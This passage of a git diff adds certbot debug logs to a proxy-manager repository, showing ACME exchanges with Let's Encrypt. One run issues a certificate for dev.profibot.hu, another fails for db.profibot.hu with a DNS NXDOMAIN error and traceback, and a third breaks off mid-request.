fULB7aUJl6BaG7DpoOchX7TcbahAWzgmCRHB8uIGzpzlajQkkeQ +2025-12-24 22:16:07,418:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager +2025-12-24 22:16:07,419:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive. +2025-12-24 22:16:07,419:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live. +2025-12-24 22:16:07,420:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/README. +2025-12-24 22:16:07,421:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-4. +2025-12-24 22:16:07,421:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-4. +2025-12-24 22:16:07,422:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-4/cert.pem. +2025-12-24 22:16:07,422:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-4/privkey.pem. +2025-12-24 22:16:07,422:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-4/chain.pem. +2025-12-24 22:16:07,423:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-4/fullchain.pem. +2025-12-24 22:16:07,423:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-4/README. +2025-12-24 22:16:07,433:DEBUG:certbot.configuration:Var account=e417a583de478a0cfdeed332c1113068 (set by user). +2025-12-24 22:16:07,433:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). +2025-12-24 22:16:07,433:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). +2025-12-24 22:16:07,433:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). +2025-12-24 22:16:07,433:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). +2025-12-24 22:16:07,433:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). +2025-12-24 22:16:07,433:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). +2025-12-24 22:16:07,433:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). +2025-12-24 22:16:07,433:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-24 22:16:07,433:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-24 22:16:07,433:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). +2025-12-24 22:16:07,434:DEBUG:certbot.configuration:Var webroot_map={'dev.profibot.hu': '/data/letsencrypt-acme-challenge'} (set by user). +2025-12-24 22:16:07,435:DEBUG:certbot._internal.display.obj:Notifying user: +Successfully received certificate. +Certificate is saved at: /etc/letsencrypt/live/npm-4/fullchain.pem +Key is saved at: /etc/letsencrypt/live/npm-4/privkey.pem +This certificate expires on 2026-03-24. +These files will be updated when the certificate renews. +2025-12-24 22:16:07,435:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: +2025-12-24 22:16:07,435:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. +2025-12-24 22:16:07,436:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: + * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate + * Donating to EFF: https://eff.org/donate-le diff --git a/proxy-manager/data/logs/letsencrypt.log.16 b/proxy-manager/data/logs/letsencrypt.log.16 new file mode 100755 index 0000000..85636ef --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.16 @@ -0,0 +1,297 @@ +2025-12-24 22:14:51,048:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-24 22:14:51,048:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-24 22:14:51,048:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-3', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'db.profibot.hu'] +2025-12-24 22:14:51,048:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-24 22:14:51,058:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-24 22:14:51,059:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-24 22:14:51,059:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-24 22:14:51,059:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-24 22:14:51,059:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-24 22:14:51,096:DEBUG:certbot._internal.main:Picked account: +2025-12-24 22:14:51,097:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-24 22:14:51,098:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-24 22:14:51,534:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-24 22:14:51,535:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:14:51 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "cjjYE-nIdGQ": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-24 22:14:51,536:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for db.profibot.hu +2025-12-24 22:14:51,543:DEBUG:acme.client:Requesting fresh nonce +2025-12-24 22:14:51,543:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-24 22:14:51,687:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-24 22:14:51,688:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:14:51 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: IijzadlSSwfrRfDfmPGry91vXRKjuZB7VHY1XaZ-rap0QQQQxXE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-24 22:14:51,688:DEBUG:acme.client:Storing nonce: IijzadlSSwfrRfDfmPGry91vXRKjuZB7VHY1XaZ-rap0QQQQxXE +2025-12-24 22:14:51,689:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "db.profibot.hu"\n }\n ]\n}' +2025-12-24 22:14:51,693:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsU1N3ZnJSZkRmbVBHcnk5MXZYUktqdVpCN1ZIWTFYYVotcmFwMFFRUVF4WEUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "LrdJjivFds5xHoPIjCaMi7ZUZWVd11UClupFsqz5eo-bOk4XNF51JPkBrH_QAfbioEGk02TeGQoW-IYiWiEnjlIWqe7gZp1hvZJHyPOXmj5eKhX0QG6AhPMOEa6ig0zeaGRKz_5FTutgoBZ79rTnEaRxgeLCCNDkO1tZ0CdkIKOmbJhB-4S8QPxltr20042jaLv03KdEAttkYOKh4Gyt6ZV3X4hBzfflARDxTmG_pcFfX4IZNz2tHcp0MLvSfE-6BimZH6khSHDDi9Y2veJ8V5mDsh2rxCdXh2mEBYodwndgs6USq_NCFRvgn6-MvDFLav3otdp2djeG4sboEPdZGg", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImRiLnByb2ZpYm90Lmh1IgogICAgfQogIF0KfQ" +} +2025-12-24 22:14:52,015:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 348 +2025-12-24 22:14:52,016:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Wed, 24 Dec 2025 22:14:51 GMT +Content-Type: application/json +Content-Length: 348 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462336901876 +Replay-Nonce: GxwILcG0cXkIVSH6rVc-HIFE7HjoA_Lc4AveBaIiADk3IEvtJLw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2025-12-31T22:14:51Z", + "identifiers": [ + { + "type": "dns", + "value": "db.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535012466" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462336901876" +} +2025-12-24 22:14:52,017:DEBUG:acme.client:Storing nonce: GxwILcG0cXkIVSH6rVc-HIFE7HjoA_Lc4AveBaIiADk3IEvtJLw +2025-12-24 22:14:52,017:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:14:52,021:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535012466: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJHeHdJTGNHMGNYa0lWU0g2clZjLUhJRkU3SGpvQV9MYzRBdmVCYUlpQURrM0lFdnRKTHciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDEyNDY2In0", + "signature": "kmX1GQ4a18bYMlyDfxUeiu1a5J9kMVeI-xBorSs_RMlhQ3z2daIb4-3RJXQxIlpPyHaBm5d7puzTzYUxmioNcT8rCim3l6iiaRzMX7_RwMD2vAWhg_zbBAiZtHw6Lc_xk4rjnNBW0ayVRZBCF0V1A757fCch4LLMKQsRKAy7FuVDjK5psKtjrtZR0hbogJl6X7a9E3Cr3IQQXfNpjyt5bS8sZbw_ZIo-ICxUAys7uzokwK1Pile4ZSLmniztTPScS99-V1fevHbIk8kI_adCREuS1Pr8ogDWmC-yQ_2Nikp2Z-hWINjQdNmrWyBvF0uh-lmBHyRZg9sikgl2mZVj6g", + "payload": "" +} +2025-12-24 22:14:52,168:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535012466 HTTP/1.1" 200 822 +2025-12-24 22:14:52,169:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:14:52 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: GxwILcG0PYT_Iz8-ARQlgFqK26KUDVKHgSGuRtlKjXPc6322qdg +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:14:51Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535012466/88WzhQ", + "status": "pending", + "token": "g6-uo3UCX0xNzx08Lq2qM2-dTzz-hH_Gs-lBYFBn5rs" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535012466/vwKyRw", + "status": "pending", + "token": "g6-uo3UCX0xNzx08Lq2qM2-dTzz-hH_Gs-lBYFBn5rs" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535012466/T-eoHg", + "status": "pending", + "token": "g6-uo3UCX0xNzx08Lq2qM2-dTzz-hH_Gs-lBYFBn5rs" + } + ] +} +2025-12-24 22:14:52,169:DEBUG:acme.client:Storing nonce: GxwILcG0PYT_Iz8-ARQlgFqK26KUDVKHgSGuRtlKjXPc6322qdg +2025-12-24 22:14:52,170:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535012466/vwKyRw', 'status': 'pending', 'token': 'g6-uo3UCX0xNzx08Lq2qM2-dTzz-hH_Gs-lBYFBn5rs'} +2025-12-24 22:14:52,171:INFO:certbot._internal.auth_handler:Performing the following challenges: +2025-12-24 22:14:52,171:INFO:certbot._internal.auth_handler:http-01 challenge for db.profibot.hu +2025-12-24 22:14:52,171:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2025-12-24 22:14:52,172:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2025-12-24 22:14:52,173:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/g6-uo3UCX0xNzx08Lq2qM2-dTzz-hH_Gs-lBYFBn5rs +2025-12-24 22:14:52,174:DEBUG:acme.client:JWS payload: +b'{}' +2025-12-24 22:14:52,175:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535012466/88WzhQ: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJHeHdJTGNHMFBZVF9JejgtQVJRbGdGcUsyNktVRFZLSGdTR3VSdGxLalhQYzYzMjJxZGciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjMyNTM1MDEyNDY2Lzg4V3poUSJ9", + "signature": "gZYX3MKtku6YVuw07YWAKCbTMQ40CyGsBP7GWq6H9MmwzyKuKVs_kQ2uCL8FPa6Vu0jspuGzKCJjYxmDn0ovWAHFsvQPqYhK4vR7Cs14Cs91bF74vnqnE0hVhv5HgNgVH96w5FaQ5GfnNglLXCvBlRJ-IPsEYuPOK2CPTVype3Sr2XHECBlKtOXyTExY3pJKzx_BFZtxwWoB-u5CAOUBuAtHxtmB0C0GH995peahgotHOMSq0dxrzSckzS4IrknmkpYf8Njjtipl1g9PNObCJRuEKARZQePe3nEE0_8v73g45zwwyMxLa-K7r517jazw3DbF7vqogBLcXll1hfhmew", + "payload": "e30" +} +2025-12-24 22:14:52,319:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/632535012466/88WzhQ HTTP/1.1" 200 195 +2025-12-24 22:14:52,320:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:14:52 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535012466/88WzhQ +Replay-Nonce: GxwILcG00iXy5cX19eh_NT2zLbtaE-ikAdluAH86LPZ1jimKvHI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535012466/88WzhQ", + "status": "pending", + "token": "g6-uo3UCX0xNzx08Lq2qM2-dTzz-hH_Gs-lBYFBn5rs" +} +2025-12-24 22:14:52,320:DEBUG:acme.client:Storing nonce: GxwILcG00iXy5cX19eh_NT2zLbtaE-ikAdluAH86LPZ1jimKvHI +2025-12-24 22:14:52,321:INFO:certbot._internal.auth_handler:Waiting for verification... +2025-12-24 22:14:53,322:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:14:53,325:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535012466: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJHeHdJTGNHMDBpWHk1Y1gxOWVoX05UMnpMYnRhRS1pa0FkbHVBSDg2TFBaMWppbUt2SEkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDEyNDY2In0", + "signature": "JT6aFEe2sHCkbj2OGezPJzuHWZnNShWxa45fiMhyasgtzrwxzRzzlsDKzf0at__L3zuZghOqXeu-E_X3uS8xj0IzXhKaD8whn1xPNfnZpCppEnHs472fBMA459G9pLXLWO3hQ8UaRyUhTQSQ95bZhSy8JKFlTTR4rsEZwoxEaZFmBpMZWQm-U6TdsIstc_Gf2X-2Gb9nWQREjgovCnNEg1yQ1GAlKB2vMZBbiEv6eMRXf24vdxLnU5tvXaYT-_7laHWPcPLjSGLEBDtC0jZS6qhOEPUdE5hAM5OPLy8-pE895XumTfGgvlDZ4Vtxj97DPTzOHnAApOsCRaQ5wQvBNw", + "payload": "" +} +2025-12-24 22:14:53,470:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535012466 HTTP/1.1" 200 749 +2025-12-24 22:14:53,470:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:14:53 GMT +Content-Type: application/json +Content-Length: 749 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: GxwILcG0q7YEo4peu5y9dMbLLEI43eN_n54-ZleCHHrDlLNO8XA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "invalid", + "expires": "2025-12-31T22:14:51Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535012466/88WzhQ", + "status": "invalid", + "validated": "2025-12-24T22:14:52Z", + "error": { + "type": "urn:ietf:params:acme:error:dns", + "detail": "DNS problem: NXDOMAIN looking up A for db.profibot.hu - check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for db.profibot.hu - check that a DNS record exists for this domain", + "status": 400 + }, + "token": "g6-uo3UCX0xNzx08Lq2qM2-dTzz-hH_Gs-lBYFBn5rs" + } + ] +} +2025-12-24 22:14:53,471:DEBUG:acme.client:Storing nonce: GxwILcG0q7YEo4peu5y9dMbLLEI43eN_n54-ZleCHHrDlLNO8XA +2025-12-24 22:14:53,471:INFO:certbot._internal.auth_handler:Challenge failed for domain db.profibot.hu +2025-12-24 22:14:53,472:INFO:certbot._internal.auth_handler:http-01 challenge for db.profibot.hu +2025-12-24 22:14:53,472:DEBUG:certbot._internal.display.obj:Notifying user: +Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems: + Domain: db.profibot.hu + Type: dns + Detail: DNS problem: NXDOMAIN looking up A for db.profibot.hu - check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for db.profibot.hu - check that a DNS record exists for this domain + +Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet. + +2025-12-24 22:14:53,474:DEBUG:certbot._internal.error_handler:Encountered exception: +Traceback (most recent call last): + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. + +2025-12-24 22:14:53,474:DEBUG:certbot._internal.error_handler:Calling registered functions +2025-12-24 22:14:53,474:INFO:certbot._internal.auth_handler:Cleaning up challenges +2025-12-24 22:14:53,474:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/g6-uo3UCX0xNzx08Lq2qM2-dTzz-hH_Gs-lBYFBn5rs +2025-12-24 22:14:53,475:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2025-12-24 22:14:53,476:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 505, in _get_order_and_authorizations + authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. +2025-12-24 22:14:53,481:ERROR:certbot._internal.log:Some challenges have failed. diff --git a/proxy-manager/data/logs/letsencrypt.log.17 b/proxy-manager/data/logs/letsencrypt.log.17 new file mode 100755 index 0000000..daf4158 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.17 @@ -0,0 +1,297 @@ +2025-12-24 21:21:30,609:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-24 21:21:30,609:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-24 21:21:30,610:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-2', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'dev.profibot.hu'] +2025-12-24 21:21:30,610:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-24 21:21:30,621:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-24 21:21:30,622:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-24 21:21:30,622:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-24 21:21:30,622:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-24 21:21:30,622:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-24 21:21:30,668:DEBUG:certbot._internal.main:Picked account: +2025-12-24 21:21:30,668:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-24 21:21:30,670:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-24 21:21:31,147:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-24 21:21:31,148:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 21:21:31 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "Jjy9QrlGvGk": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-24 21:21:31,157:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for dev.profibot.hu +2025-12-24 21:21:31,171:DEBUG:acme.client:Requesting fresh nonce +2025-12-24 21:21:31,172:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-24 21:21:31,327:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-24 21:21:31,328:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 21:21:31 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEuVmUQFJ48dXZKrJCcvzAA6_fm_Rp1FqtWhIe7bnFgPw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-24 21:21:31,328:DEBUG:acme.client:Storing nonce: 58tS3qjEuVmUQFJ48dXZKrJCcvzAA6_fm_Rp1FqtWhIe7bnFgPw +2025-12-24 21:21:31,328:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": 